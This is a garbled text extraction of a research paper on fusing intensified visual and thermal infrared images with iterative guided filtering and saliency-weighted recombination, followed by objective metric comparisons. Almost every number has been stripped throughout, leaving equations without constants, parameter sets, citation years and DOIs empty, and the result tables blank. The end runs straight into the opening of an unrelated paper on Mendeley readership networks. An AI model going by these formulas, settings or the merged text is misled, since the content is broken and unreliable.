images together with the results of the proposed image fusion scheme, for the different scenes that were used in the present study. we will now discuss the proposed fusion scheme in more detail. consider two co-registered source images x (x,y) and y (x,y). the proposed scheme then applies iterative guided filtering (igf) to the input images xi and yi to obtain progressively coarser image representations xi+ and yi+ (i> ): igf(xi,ri,εi)=xi+ ; i∈{ , , } ( ) where the parameters εi and ri represent respectively the range and the spatial variances of the guided filter at iteration step i. in this study the number of iteration steps is set to . by letting each finer scale image serve as the approximate layer for the preceding coarser scale image the successive size-selective residual layers dxi are simply obtained by subtraction as follows: dxi=xi−xi+ ; i∈{ , , }. ( ) figure shows the approximate and residual layers that are obtained this way for the tank scene (nr in fig. ). the edge-preserving properties of the iterative guided filter guarantee a graceful decomposition of the source images into details at different spatial scales. the filter size and regularization parameters used in this study are respectively set to ri={ , , } and εi={ . , . , . } for i={ , , }. visual saliency refers to the physical, bottom-up distinctness of image details (fecteau & munoz, ). it is a relative property that depends on the degree to which a detail is visually distinct from its background (wertheim, ). since saliency quantifies the relative visual importance of image details saliency maps are frequently used in the weighted recombination phase of multi-scale image fusion schemes (bavirisetti & dhuli, b; cui et al., ; gan et al., ). frequency tuned filtering computes bottom-up saliency as local multi-scale luminance contrast (achanta et al., ). the saliency map s for an image i is computed as s(x,y)= ∥∥iµ−if (x,y)∥∥ ( ) where iµ is the arithmetic mean image feature vector, if represents a gaussian blurred version of the original image, using a × separable binomial kernel, ‖‖ is the l norm (euclidian distance), and x,y are the pixel coordinates. toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure original input and fused images for all scenes. the intensified visual (ii), thermal infrared (ir) or near infrared (nir: scene ) source images together with the result of the proposed fusion scheme (f) for each of the scenes used in this study. a recent and extensive evaluation study comparing state-of-the-art saliency models found that the output of this simple saliency model correlates more strongly with human visual perception than the output produced by any of the other available models (toet, ). toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure base and detail layers for the tank scene. original intensified visual (a) and thermal infrared (h) images for scene nr. , with their respective base b–d and i–k and detail e–g and l–n layers at suc- cessively lower levels of resolution. in the proposed fusion scheme we first compute saliency maps sxi and syi for the individual source layers xi and yi, i∈{ , , }. binary weight maps bwxi and bwyi are then computed by taking the pixelwise maximum of corresponding saliency maps sxi and syi: bwxi(x,y)= { if sxi(x,y)>syi(x,y) otherwise bwyi(x,y)= { if syi(x,y)>sxi(x,y) otherwise. ( ) the resulting binary weight maps are noisy and typically not well aligned with object boundaries, which may give rise to artefacts in the final fused image. spatial consistency is therefore restored through guided filtering (gf) of these binary weight maps with the corresponding source layers as guidance images: wxi =gf(bwxi,xi) wyi =gf(bwyi,yi). ( ) as noted before guided filtering combines noise reduction with edge preservation, while the output is locally approximately a scaled version of the guidance image. in the present scheme these properties are used to transform the binary weight maps into smooth toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure computing smoothed weight maps by guided filtering of binary weight maps. saliency maps at levels , and for respectively the in- tensified visual (a–c) and thermal infrared (d–f) images from fig. . complementary binary weight maps for both image modalities (g–i and j– l) are obtained with a pointwise maximum operator at corresponding levels. smooth continuous weight maps (m–o and p–r) are produced by guided filtering of the binary weight maps with their corresponding base layers as guidance images. continuous weight maps through guided filtering with the corresponding source images as guidance images. figure illustrates the process of computing smoothed weight maps by guided filtering of the binary weight maps resulting from the pointwise maximum of the corresponding source layer saliency maps for the tank scene. fused residual layers are then computed as the normalized weighted mean of the corresponding source residual layers: dfi= wxi ·dxi+wyi ·dyi wxi+wyi . ( ) the fused image f is finally obtained by adding the fused residual layers to the average value of the coarsest source layers: f = x +y + ∑ i= dfi. ( ) by using guided filtering both in the decomposition stage and in the recombination stage, this proposed fusion scheme optimally benefits from both the multi-scale edge-preserving characteristics (in the iterative framework) and the structure restoring capabilities (through guidance bythe originalsource images) ofthe guided filter. themethod is easyto implement and computationally efficient. methods and material this section presents the test imagery and computational metrics used to assess the performance of the proposed images fusion scheme in comparison to existing multi-scale fusion schemes. toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison with existing multiresolution fusion schemes. original intensified visual (a) and thermal infrared (b) images for scene nr , and the fused results obtained with respectively a contrast pyramid (c), gradient pyramid (d), laplace pyramid (e), morphological pyramid (f), ratio pyramid (g), dwt (h), sidwt (i), and the proposed method (j), for scene nr. . test imagery figure shows the intensified visual (ii), thermal infrared (ir) or near infrared (nir: scene ) source images together with the result of the proposed fusion scheme (f) for each of the scenes used in this study. the scenes are part of the tno image fusion dataset (toet, ) with the following identifiers: airplane_in_trees, barbed_wire_ , jeep, kaptein_ , marne_ , marne_ , marne_ , reek, tank, nato_camp_sequence, soldier_behind_smoke, vlasakkers. multi-scale fusion schemes used for comparison in this study we compare the performance of our image fusion scheme with seven other popular image fusion methods based on multi-scale decomposition including the laplacian pyramid (burt & adelson, ), the ratio of low-pass pyramid (toet, b), the contrast pyramid (toet, van ruyven & valeton, ), the filter-subtract-decimate laplacian pyramid (burt, ; burt & kolczynski, ), the gradient pyramid (burt, ; burt & kolczynski, ), the morphological pyramid (toet, a), the discrete wavelet transform (lemeshewsky, ; li, manjunath & mitra, ; li, kwok & wang, ; scheunders & de backer, ), and a shift invariant extension of the discrete wavelet transform (lemeshewsky, ; rockinger, ; rockinger, ; rockinger & fechner, ). we used rockinger’s freely available matlab image fusion toolbox (www.metapix.de/toolbox.htm) to compute these fusion schemes. to allow a straightforward comparison, the number of scale levels is set to in all methods, and simple averaging is used to compute the approximation of the fused image representation at the coarsest spatial scale. figures – show the results of the proposed method together with the results of other seven fusion schemes for some of the scenes used in this study (scenes – and ). objective evaluation metrics image fusion results can be evaluated using either subjective or objective measures. subjective methods are based on psycho-visual testing and are typically expensive in terms toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.metapix.de/toolbox.htm http://dx.doi.org/ . /peerj-cs. figure as fig. , for scene nr. . figure as fig. , for scene nr. . figure as fig. , for scene nr. . toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure as fig. , for scene nr. . of time, effort, and equipment required. also, in most cases, there is only little difference among fusion results. this makes it difficult to subjectively perform the evaluation of fusion results. therefore, many objective evaluation methods have been developed (for an overview see e.g., li, li & gong, ; liu et al., ). however, so far, there is no universally accepted metric to objectively evaluate the image fusion results. in this paper, we use four frequently applied computational metrics to objectively evaluate and compare the performance of different image fusion methods. the metrics we use are entropy, the mean structural similarity index (mssim), normalized mutual information (nmi), and normalized feature mutual information (nfmi). these metrics will be briefly discussed in the following sections. entropy entropy (e) is a measure of the information content in a fused image f. entropy is defined as ef =− l− ∑ i= pf(i)logpf(i) ( ) where pf(i) indicates the probability that a pixel in the fused image f has a gray value i, and the gray values range from to l. the larger the entropy is, the more informative the fused image is. a fused image is more informative than either of its source images when its entropy is higher than the entropy of its source images. mean structural similarity index the structural similarity (ssim: wang et al., ) index is a stabilized version of the universal image quality index (uiq: wang & bovik, ) which can be used to quantify the structural similarity between a source image a and a fused image f: ssimx,y = µxµy+c µ x+µ y+c · σxσy+c σ x +σ y +c · σxy+c σxσy+c ( ) toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. where x and y represent local windows of size m×n in respectively a and f, and µx = m×n m∑ i= n∑ j= x(i,j), µy = m×n m∑ i= n∑ j= y(i,j) ( ) σ x = m×n m∑ i= n∑ j= (x(i,j)−µx) , σ y = m×n m∑ i= n∑ j= (y(i,j)−µy) ( ) σ xy = m×n m∑ i= n∑ j= (x(i,j)−µx)(y(i,j)−µy). ( ) by default, the stabilizing constants are set to c =( . ·l) , c =( . ·l) and c =c / , where l is the maximal gray value. the value of ssim is bounded and ranges between − and (it is only when both images are identical). the ssim is typically computed over a sliding window to compare local patterns of pixel intensities that have been normalized for luminance and contrast. the mean structural similarity (mssim) index quantifies the overall similarity between a source image a and a fused image f: mssima,f = nw nw∑ i= ssimxi,yi ( ) where nw represents the number of local windows of the image. an overall image fusion quality index can then be defined as the mean mssim values between each of the source images and the fused result: mssima,bf = mssima,f +mssimb,f ( ) mssima,bf ranges between − and (it is only when both images are identical). normalized mutual information mutual information (mi) measures the amount of information that two images have in common. it can be used to quantify the amount of information from a source image that is transferred to a fused image (qu, zhang & yan, ). the mutual information miaf between a source image a and a fused image f is defined as: mia,f = ∑ i,j pa,f(i,j)log pa,f(i,j) pa(i)pf(j) ( ) where pa(i) and pf(j) are the probability density functions in the individual images, and paf(i,j) is the joint probability density function. the traditional mutual information metric is unstable and may bias the measure towards the source image with the highest entropy. this problem can be resolved by computing the normalized mutual information (nmi) as follows (hossny, nahavandi & creighton, ): nmia,bf = mia,f ha+hf + mib,f hb+hf ( ) toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. where ha,hb and hf are the marginal entropy of a, b and f, and mia,f and mib,f represent the mutual information between respectively the source image a and the fused image f and between the source image b and the fused image f. a higher value of nmi indicates that more information from the source images is transferred to the fused image. the nmi metric varies between and . normalized feature mutual information the feature mutual information (fmi) metric calculates the amount of image features that two images have in common (haghighat & razian, ; haghighat, aghagolzadeh & seyedarabi, ). this method outperforms other metrics (e.g., e, nmi) in consistency with the subjective quality measures. previously proposed mi-based image fusion quality metrics use the image histograms to compute the amount of information a source and fused image have in common (cvejic, canagarajah & bull, ; qu, zhang & yan, ). however, image histograms contain no information about local image structure (spatial features or local image quality) and only provide statistical measures of the number of pixels in a specific gray-level. however, since meaningful image information is contained in visual features, image fusion quality measures should measure the extent to which these visual features are transferred into the fused image from each of the source images. the feature mutual information (fmi) metric calculates the mutual information between image feature maps (haghighat & razian, ; haghighat, aghagolzadeh & seyedarabi, ). a typical image feature map is for instance the gradient map, which contains information about the pixel neighborhoods, edge strength and directions, texture and contrast. given two source images as a and b and their fused image as f, the fmi metric first extracts feature maps of the source and fused images using a feature extraction method (e.g., gradient). after feature extraction, the feature images a′, b′ and f ′ are normalized to create their marginal probability density functions pa′, pb′ and pf′. the joint probability density functions pa′,f′ and pb′,f′ are then estimated from the marginal distributions using nelsen’s method (nelsen, ). the algorithm is described in more detail elsewhere (haghighat, aghagolzadeh & seyedarabi, ). the fmi metric between a source image a and a fused image f is then given by fmia,f =mia′,f′ = ∑ i,j pa′,f′(i,j)log pa′,f′(i,j) pa′(i)pf′(j) ( ) and the normalized feature mutual information (fmi) can be computed as follows fmia,bf = mia′,f′ ha′+hf′ + mib′,f′ hb′+hf′ . ( ) in practice the fmi is computed locally over small corresponding windows between the source and the fused images and averaged over all windows covering the image plane (haghighat & razian, ). toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table entropy values for each of the methods tested and for all scenes. scene nr. contrast dwt gradient laplace morph ratio sidwt igf . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . results fusion evaluation here we assess the performance of the proposed image fusion scheme on the intensified visual and thermal infrared images for each of the selected scenes, using entropy, the mean structural similarity index (mssim), normalized mutual information (nmi), and normalized feature mutual information (nfmi) as the objective performance measures. we also compare the results of the proposed method with those of seven other popular multi-scale fusion schemes. table lists the entropy of the fused result for the proposed method (igf) and all seven multi-scale comparison methods (contrast pyramid, dwt, gradient pyramid, laplace pyramid, morphological pyramid, ratio pyramid, sidwt). it appears that igf produces a fused image with the highest entropy for of the test scenes. note that a larger entropy implies more edge information, but it does not mean that the additional edges are indeed meaningful (they may result from over enhancement or noise). therefore, we also need to consider structural information metrics. table shows that igf outperforms all other multi-scale methods tested here in terms of mssim. this means that the mean overall structural similarity between both source images the fused image f is largest for the proposed method. table shows that igf also outperforms all other multi-scale methods tested here in terms of nmi. this indicates that the proposed igf fusion scheme transfers more information from the source images to the fused image than any of the other methods. table shows that igf also outperforms of the other multi-scale methods tested here in terms of nfmi. igf is only outperformed by sidwt for scene and by the contrast pyramid for scene . this implies that fused images produced by the proposed igf scheme typically have a larger amount of image features in common with their source images than the results of most other fusion schemes. toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mssim values for each of the methods tested and for all scenes. scene nr. contrast dwt gradient laplace morph ratio sidwt igf . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . table nmi values for each of the methods tested and for all scenes. scene nr. contrast dwt gradient laplace morph ratio sidwt igf . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . summarizing, the proposed igf fusion scheme appears to outperform the other multi-scale fusion methods investigated here in most of the conditions tested. runtime in this study we used a matlab implementation of the gf and igf written by zhang et al. ( ) that is freely available from the authors (at http://www.cs.cuhk.edu.hk/~leojia/ projects/rollguidance). we made no effort to optimize the code of the algorithms. we conducted a runtime test on a dell latitude laptop with an intel i ghz cpu and gb memory. the algorithms were implemented in matlab a. only a single thread was used without involving any simd instructions. for this test we used the set of test images described in ‘test imagery.’ as noted before, the filter size and regularization parameters used in this study are respectively set to ri ={ , , } and εi ={ . , . , . } for toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.cs.cuhk.edu.hk/~leojia/projects/rollguidance http://www.cs.cuhk.edu.hk/~leojia/projects/rollguidance http://dx.doi.org/ . /peerj-cs. table nfmi values for each of the methods tested and for all scenes. scene nr. contrast dwt gradient laplace morph ratio sidwt igf . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . spatial scale levels i={ , , }. the mean runtime of the proposed fusion method was . ± . s. discussion and conclusions we propose a multi-scale image fusion scheme based on guided filtering. iterative guided filtering is used to decompose the source images into approximation and residual layers. initial binary weighting maps are computed as the pixelwise maximum of the individual source saliency maps, obtained from frequency tuned filtering. spatially consistent and smooth weighting maps are then obtained through guided filtering of the binary weighting maps with their corresponding source layers as guidance images. saliency weighted recombination of the individual source residual layers and the mean of the coarsest scale source layers finally yields the fused image. the proposed multi-scale image fusion scheme achieves spatial consistency by using guided filtering both at the decomposition and at the recombination stage of the multi-scale fusion process. application to multiband visual (intensified) and thermal infrared imagery demonstrates that the proposed method obtains state-of-the-art performance for the fusion of multispectral nightvision images. the method has a simple implementation and is computationally efficient. additional information and declarations funding the effort was sponsored by the air force office of scientific research, air force material command, usaf, under grant number fa - - - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the author: air force office of scientific research, air force material command, usaf: fa - - - . competing interests the author declares there are no competing interests. author contributions • alexander toet conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: figshare: tno image fusion dataset http://dx.doi.org/ . /m .figshare. . references achanta r, hemami s, estrada f, süsstrunk s. . frequency-tuned salient region de- tection. in: hemami s, estrada f, susstrunk s, eds. ieee international conference on computer vision and pattern recognition (cvpr ). piscataway: ieee, – . agarwal j, bedi ss. . implementation of hybrid image fusion technique for feature enhancement in medical diagnosis. human-centric computing and information sciences ( ): – doi . /s - - - . bavirisetti dp, dhuli r. a. fusion of infrared and visible sensor images based on anisotropic diffusion and karhunen–loeve transform. ieee sensors journal ( ): – doi . /jsen. . . bavirisetti dp, dhuli r. b. two-scale image fusion of visible and infrared images using saliency detection. infrared physics and technology : – doi . /j.infrared. . . . beyan c, yigit a, temizel a. . fusion of thermal- and visible-band video for abandoned object detection. journal of electronic imaging ( ): – doi . / . . bhatnagar g, wu qmj. . human visual system based framework for concealed weapon detection. in: the canadian conference on computer and robot vision (crv). piscataway: ieee, – . biswas b, chakrabarti a, dey kn. . spine medical image fusion using wiener filter in shearlet domain. in: ieee nd international conference on recent trends in information systems (retis ). piscataway: ieee, – . black mj, sapiro g, marimont dh, heeger d. . robust anisotropic diffusion. ieee transactions on image processing ( ): – doi . / . . toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jsen. . http://dx.doi.org/ . /j.infrared. . . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. blum rs, liu z. . multi-sensor image fusion and its applications. boca raton: crc press, taylor & francis group. bulanona dm, burks tf, alchanatis v. . image fusion of visible and thermal images for fruit detection. biosystems engineering ( ): – doi . /j.biosystemseng. . . . burt pj. . smart sensing with a pyramid vision machine. proceedings ieee ( ): – doi . / . . burt pj. . a gradient pyramid basis for pattern-selective image fusion. in: sid international symposium . playa del rey: society for information display, – . burt pj, adelson eh. . the laplacian pyramid as a compact image code. ieee transactions on communications ( ): – doi . /tcom. . . burt pj, kolczynski rj. . enhanced image capture through fusion. in: fourth international conference on computer vision. piscataway: ieee computer society press, – . cui g, feng h, xu z, li q, chen y. . detail preserved fusion of visible and infrared images using regional saliency extraction and multi-scale image decomposition. optics communications : – doi . /j.optcom. . . . cvejic n, canagarajah cn, bull dr. . image fusion metric based on mu- tual information and tsallis entropy. electronics letters ( ): – doi . /el: . daneshvar s, ghassemian h. . mri and pet image fusion by combining ihs and retina-inspired models. information fusion ( ): – doi . /j.inffus. . . . farbman z, fattal r, lischinski d, szeliski r. . edge-preserving decompositions for multi-scale tone and detail manipulation. acm transactions on graphics ( - article no. ): – doi . / . . fecteau jh, munoz dp. . salience, relevance, and firing: a priority map for target selection. trends in cognitive sciences ( ): – doi . /j.tics. . . . gan w, wu x, wu w, yang x, ren c, he x, liu k. . infrared and visible image fusion with the use of multi-scale edge-preserving decomposition and guided image filter. infrared physics & technology : – doi . /j.infrared. . . . ghassemian h. . a retina based multi-resolution image-fusion. in: ieee interna- tional geoscience and remote sensing symposium (igrss ). piscataway: ieee, – . haghighat mba, aghagolzadeh a, seyedarabi h. . a non-reference image fusion metric based on mutual information of image features. computers & electrical engineering ( ): – doi . /j.compeleceng. . . . haghighat m, razian ma. . fast-fmi: non-reference image fusion metric. piscataway: ieee, – . he k, sun j, tang x. . guided image filtering. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.biosystemseng. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /tcom. . http://dx.doi.org/ . /j.optcom. . . http://dx.doi.org/ . /el: http://dx.doi.org/ . /j.inffus. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.tics. . . http://dx.doi.org/ . /j.infrared. . . http://dx.doi.org/ . /j.compeleceng. . . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /peerj-cs. hossny m, nahavandi s, creighton d. . comments on ‘‘information mea- sure for performance of image fusion’’. electronics letters ( ): – doi . /el: . jacobson np, gupta mr. . design goals and solutions for display of hyperspectral images. ieee transactions on geoscience and remote sensing ( ): – doi . /tgrs. . . jacobson np, gupta mr, cole jb. . linear fusion of image sets for display. ieee transactions on geoscience and remote sensing ( ): – doi . /tgrs. . . jiang d, zhuang d, huan y, fu j. . survey of multispectral image fusion techniques in remote sensing applications. in: zheng y, ed. image fusion and its applications. rijeka, croatia: intech open, – . kong sg, heo j, boughorbel f, zheng y, abidi br, koschan a, yi m, abidi ma. . multiscale fusion of visible and thermal ir images for illumination- invariant face recognition. international journal of computer vision ( ): – doi . /s - - - . kong w, wang b, lei y. . technique for infrared and visible image fusion based on non-subsampled shearlet transform & spiking cortical model. infrared physics & technology : – doi . /j.infrared. . . . kumar bks. . image fusion based on pixel significance using cross bilateral filter. signal, image and video processing ( ): – doi . /s - - - . lemeshewsky gp. . park sj, juday rd, eds. multispectral multisensor image fusion using wavelet transforms. bellingham: the international society for optical engineering, – . lepley jj, averill mt. . detection of buried mines and explosive objects using dual- band thermal imagery. in: harmon rs, holloway jh, broach jt, eds. detection and sensing of mines, explosive objects, and obscured targets xvi, vol. spie- . bellingham: the international society for optical engineering, v - . li s, kang x, hu j. . image fusion with guided filtering. ieee transactions on image processing ( ): – doi . /tip. . . li s, kwok jt, wang y. . using the discrete wavelet frame transform to merge landsat tm and spot panchromatic images. information fusion ( ): – doi . /s - ( ) - . li s, li z, gong j. . multivariate statistical analysis of measures for assessing the quality of image fusion. international journal of image and data fusion ( ): – doi . / . li h, manjunath bs, mitra sk. . multisensor image fusion using the wavelet transform. computer vision, graphics and image processing: graphical models and image processing ( ): – . liu z, blasch ep, xue z, zhao j, laganière r, wu w. . objective assessment of multiresolution image fusion algorithms for context enhancement in night vision: a comparative study. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /el: http://dx.doi.org/ . /tgrs. . http://dx.doi.org/ . /tgrs. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.infrared. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /peerj-cs. liu x, mei w, du h, bei j. . a novel image fusion algorithm based on nonsubsam- pled shearlet transform and morphological component analysis. signal, image and video processing ( ): – doi . /s - - - . liu z, xue z, blum rs, laganiëre r. . concealed weapon detection and visu- alization in a synthesized image. pattern analysis & applications ( ): – doi . /s - - - . motamed c, lherbier r, hamad d. . a multi-sensor validation approach for human activity monitoring. in: th international conference on information fusion (information fusion ). piscataway: ieee. nelsen rb. . discrete bivariate distributions with given marginals and correla- tion. communications in statistics—simulation and computation ( ): – doi . / . o’brien ma, irvine jm. . information fusion for feature extraction and the develop- ment of geospatial information. in: th international conference on information fusion. isif, – . perona p, malik j. . scale-space and edge detection using anisotropic diffusion. ieee transactions on pattern analysis and machine intelligence ( ): – doi . / . . petrovic vs, xydeas cs. . sensor noise effects on signal-level image fusion perfor- mance. information fusion ( ): – doi . /s - ( ) - . petschnigg g, agrawala m, hoppe h, szeliski r, cohen m, toyama k. . digital photography with flash and no-flash image pairs. new york: acm press, – . qu gh, zhang dl, yan pf. . information measure for performance of image fusion. electronics letters ( ): – doi . /el: . rockinger o. . image sequence fusion using a shift-invariant wavelet transform. in: ieee international conference on image processing, vol. iii. piscataway: ieee, – . rockinger o. . multiresolution-verfahren zur fusion dynamischer bildfolge. phd thesis, technische universität berlin. rockinger o, fechner t. . pixel-level image fusion: the case of image sequences. in: kadar i, ed. signal processing, sensor fusion, and target recognition vii, vol. spie- . bellingham: the international society for optical engineering, – . scheunders p, de backer s. . fusion and merging of multispectral images us- ing multiscale fundamental forms. journal of the optical society of america a ( ): – doi . /josaa. . . shah p, reddy bcs, merchant s, desai u. . context enhancement to reveal a camouflaged target and to assist target localization by fusion of multispec- tral surveillance videos. signal, image and video processing ( ): – doi . /s - - - . singh r, khare a. . fusion of multimodal medical images using daubechies complex wavelet transform—a multiresolution approach. information fusion : – doi . /j.inffus. . . . toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /el: http://dx.doi.org/ . /josaa. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.inffus. . . http://dx.doi.org/ . /peerj-cs. singh r, vatsa m, noore a. . integrated multilevel image fusion and match score fusion of visible and infrared face images for robust face recognition. pattern recognition ( ): – doi . /j.patcog. . . . tao c, junping z, ye z. . remote sensing image fusion based on ridgelet transform. in: ieee international geoscience and remote sensing symposium (igarss’ ), vol. . piscataway: ieee, – . tian yp, zhou ky, feng x, yu sl, liang h, liang b. . image fusion for infrared thermography and inspection of pressure vessel. journal of pressure vessel technology ( - article no. ): – doi . / . . toet a. a. a morphological pyramidal image decomposition. pattern recognition letters ( ): – doi . / - ( ) - . toet a. b. image fusion by a ratio of low-pass pyramid. pattern recognition letters ( ): – doi . / - ( ) - . toet a. . color image fusion for concealed weapon detection. in: carapezza em, ed. sensors, and command, control, communications, and intelligence (c i) technologies for homeland defense and law enforcement ii, vol. spie- . bellingham: spie, – . toet a. . computational versus psychophysical image saliency: a comparative evaluation study. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . toet a. . tno image fusion dataset. figshare doi . /m .figshare. . toet a, ijspeert i, waxman am, aguilar m. . fusion of visible and thermal imagery improves situational awareness. displays ( ): – doi . /s - ( ) - . toet a, van ruyven lj, valeton jm. . merging thermal and visual images by a contrast pyramid. optical engineering ( ): – doi . / . . tomasi c, manduchi r. . bilateral filtering for gray and color images. in: ieee sixth international conference on computer vision. piscataway: ieee, – . wang z, bovik ac. . a universal image quality index. ieee signal processing letters ( ): – doi . / . . wang z, bovik ac, sheikh hr, simoncelli ep. . image quality assessment: from error visibility to structural similarity. ieee transactions on image processing ( ): – doi . /tip. . . wang l, li b, tian lf. . multi-modal medical image fusion using the inter-scale and intra-scale dependencies between image shift-invariant shearlet coefficients. information fusion : – doi . /j.inffus. . . . wertheim ah. . visual conspicuity: a new simple standard, its reliability, validity and applicability. ergonomics ( ): – doi . / . xue z, blum rs. . concealed weapon detection using color image fusion. in: sixth international conference on information fusion (fusion ). piscataway: ieee, – . toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . / . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /j.inffus. . . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. xue z, blum rs, li y. . fusion of visual and ir images for concealed weapon detection. in: fifth international conference on information fusion, vol. . piscataway: ieee, – . yajie w, mowu l. . image fusion based concealed weapon detection. in: inter- national conference on computational intelligence and software engineering (cise ). piscataway: ieee, – . yang w, liu j-r. . research and development of medical image fusion. in: ieee international conference on medical imaging physics and engineering (icmipe). piscataway: ieee, – . yang s, wang m, jiao l, wu r, wang z. . image fusion based on a new contourlet packet. information fusion ( ): – doi . /j.inffus. . . . yong j, minghui w. . image fusion using multiscale edge-preserving decompo- sition based on weighted least squares filter. iet image processing ( ): – doi . /iet-ipr. . . zhang b, lu x, pei h, zhao y. . a fusion algorithm for infrared and visible images based on saliency analysis and non-subsampled shearlet transform. infrared physics & technology : – doi . /j.infrared. . . . zhang q, shen x, xu l, jia j. . rolling guidance filter. in: fleet d, pajdla t, schiele b, tuytelaars t, eds. th european conference on computer vision (eccv ), vol. iii. berlin heidelberg: springer international publishing, – . zhao j, feng h, xu z, li q, liu t. . detail enhanced multi-source fusion using visual weight map extraction based on multi scale edge preserving decomposition. optics communications : – doi . /j.optcom. . . . zhu z, huang ts. . multimodal surveillance: sensors, algorithms and systems. norwood: artech house publishers. zitová b, beneš m, blažek j. . image fusion for art analysis. in: computer vision and image analysis of art ii, vol. spie- . bellingham: the international society for optical engineering, – . zou x, bhanu b. . tracking humans using multi-modal fusion. in: nd joint ieee international workshop on object tracking and classification in and beyond the visible spectrum (otcbvs’ ). piscataway: ieee, w - - - . toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.inffus. . . http://dx.doi.org/ . /iet-ipr. . http://dx.doi.org/ . /j.infrared. . . http://dx.doi.org/ . /j.optcom. . . http://dx.doi.org/ . /peerj-cs. networks of reader and country status: an analysis of mendeley reader statistics submitted may accepted october published november corresponding author robin haunschild, r.haunschild@fkf.mpg.de academic editor ciro cattuto additional information and declarations can be found on page doi . /peerj-cs. copyright haunschild et al. distributed under creative commons cc-by . open access networks of reader and country status: an analysis of mendeley reader statistics robin haunschild , lutz bornmann and loet leydesdorff information retrieval service, max planck institute for solid state research, stuttgart, germany division for science and innovation studies, administrative headquarters of the max planck society, munich, germany amsterdam school of communication research (ascor), university of amsterdam, amsterdam, the netherlands abstract the number of papers published in journals indexed by the web of science core collection is steadily increasing. in recent years, nearly two million new papers were published each year; somewhat more than one million papers when primary research papers are considered only (articles and reviews are the document types where primary research is usually reported or reviewed). however, who reads these papers? more precisely, which groups of researchers from which (self-assigned) scientific disciplines and countries are reading these papers? is it possible to visualize readership patterns for certain countries, scientific disciplines, or academic status groups? one popular method to answer these questions is a network analysis. in this study, we analyze mendeley readership data of a set of , , articles and , reviews with publication year to generate three different networks: ( ) the net- work based on disciplinary affiliations of mendeley readers contains four groups: (i) biology, (ii) social sciences and humanities (including relevant computer sciences), (iii) bio-medical sciences, and (iv) natural sciences and engineering. in all four groups, the category with the addition “miscellaneous” prevails. ( ) the network of co-readers in terms of professional status shows that a common interest in papers is mainly shared among phd students, master’s students, and postdocs. ( ) the coun- try network focusses on global readership patterns: a group of nations is identified as core to the scientific enterprise, including russia and china as well as two thirds of the oecd (organisation for economic co-operation and development) countries. subjects data science, databases, network science and online social networks keywords mendeley, network, bibliometrics, pajek, altmetrics, vosviewer introduction bibliometrics is not only a mature research field, which develops advanced indicators for research evaluation purposes, but also a research field, which studies patterns in science. the best method 